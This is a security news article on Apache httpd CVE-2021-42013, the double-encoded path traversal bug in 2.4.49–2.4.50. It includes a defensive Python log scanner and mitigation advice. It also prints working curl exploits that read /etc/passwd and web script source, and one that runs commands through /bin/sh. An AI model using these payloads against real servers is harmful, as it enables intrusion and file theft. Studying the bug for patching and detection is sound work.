Another vulnerability in Apache httpd allowing access outside the site root directory

A new attack vector has been identified in the Apache http server that was left unfixed in the 2.4.50 update and allows access to files located outside the site root directory. In addition, researchers have found a method that, under certain non-standard settings, allows not only reading system files but also remotely executing code on the server. The problem appears only in releases 2.4.49 and 2.4.50; earlier versions are not affected. To eliminate the new vulnerability, Apache httpd 2.4.51 was promptly released.

At its core, the new issue (CVE-2021-42013) is entirely similar to the original vulnerability (CVE-2021-41773) in 2.4.49; the only difference is a different encoding of the ".." characters. Specifically, the 2.4.50 release blocked the use of the "%2e" sequence to encode a dot, but missed the possibility of double encoding: when the sequence "%%32%65" is specified, the server decodes it to "%2e" and then to ".", i.e. the "../" sequence for moving to the parent directory can be encoded as ".%%32%65/".
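The decoding behaviour described above can be checked from the defender's side by decoding request paths the same way the server does, repeatedly, and flagging any path that climbs above the configured root. The following is an added example, not code from the article or from the Apache project; the access-log lines in it are constructed sample data, and the helper names are my own.

```python
"""Flag single- and double-percent-encoded path traversal in HTTP request paths.

Added example (not from the original article). It models the decoding
chain described for CVE-2021-42013: one decode turns "%%32%65" into "%2e",
a second decode turns that into ".", so ".%%32%65/" ends up as "../".
"""
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: enough rounds to unwind realistic nesting

def iterative_decode(path: str, rounds: int = MAX_DECODE_ROUNDS) -> str:
    """Percent-decode repeatedly until the string stops changing."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_document_root(request_path: str) -> bool:
    """True if the fully decoded path ever climbs above the root directory.

    Depth is tracked per segment: a normal segment descends, ".." ascends,
    and going below zero means the request escaped the mapped root.
    """
    decoded = iterative_decode(request_path)
    depth = 0
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

# Request line inside a Combined Log Format entry: "METHOD path HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def scan_access_log(lines):
    """Return (method, raw_path, decoded_path) for each traversal attempt found."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        raw_path = match.group("path").split("?", 1)[0]  # drop the query string
        if escapes_document_root(raw_path):
            hits.append((match.group("method"), raw_path, iterative_decode(raw_path)))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Oct/2021:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.5 - - [06/Oct/2021:10:12:03 +0000] "GET /cgi-bin/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199',
    '10.0.0.5 - - [06/Oct/2021:10:12:05 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1420',
    '10.0.0.5 - - [06/Oct/2021:10:12:07 +0000] "GET /cgi-bin/../static/logo.png HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for method, raw, decoded in scan_access_log(SAMPLE_LOG):
        print(f"traversal attempt: {method} {raw} -> {decoded}")
```

The fourth sample line is deliberately left unflagged: "/cgi-bin/../static/logo.png" resolves to "/static/logo.png", which stays inside the root, so a detector keyed only on the literal string ".." would produce a false positive there. The second line shows that the check also catches the single-encoded variant fixed in 2.4.50, because iterative decoding handles both.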

Exploiting the vulnerability for code execution is possible when mod_cgi is enabled and a base path is used in which CGI script execution is allowed (for example, if the ScriptAlias directive is enabled or the ExecCGI flag is specified in the Options directive). A mandatory requirement for a successful attack is that the Apache configuration explicitly grants access to directories containing executable files, such as /bin, or to the file system root "/". Since such access is not normally granted, the code execution attack has little applicability to real systems.

At the same time, the attack that retrieves the contents of arbitrary system files and the source code of web scripts readable by the user the http server runs as remains relevant. To carry out such an attack, it is sufficient for the site to have a directory configured using the "Alias" or "ScriptAlias" directives (DocumentRoot alone is not sufficient), such as "cgi-bin".

An example exploit that runs the "id" utility on the server:

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

uid=1(daemon) gid=1(daemon) groups=1(daemon)

An example exploit that displays the contents of /etc/passwd and of one of the web scripts (to output script code, a directory defined via the "Alias" directive, in which script execution is not enabled, must be specified as the base directory):

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

curl 'http://192.168.0.1/aliaseddir/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/usr/local/apacheXNUMX/cgi-bin/test.cgi'

The issue mainly affects continuously updated distributions such as Fedora, Arch Linux and Gentoo, as well as the FreeBSD ports. Packages in the stable branches of the conservative server distributions Debian, RHEL, Ubuntu and SUSE are not affected by the vulnerability. The problem does not occur if access to directories is explicitly denied using the "require all denied" setting.

Source: opennet.ru
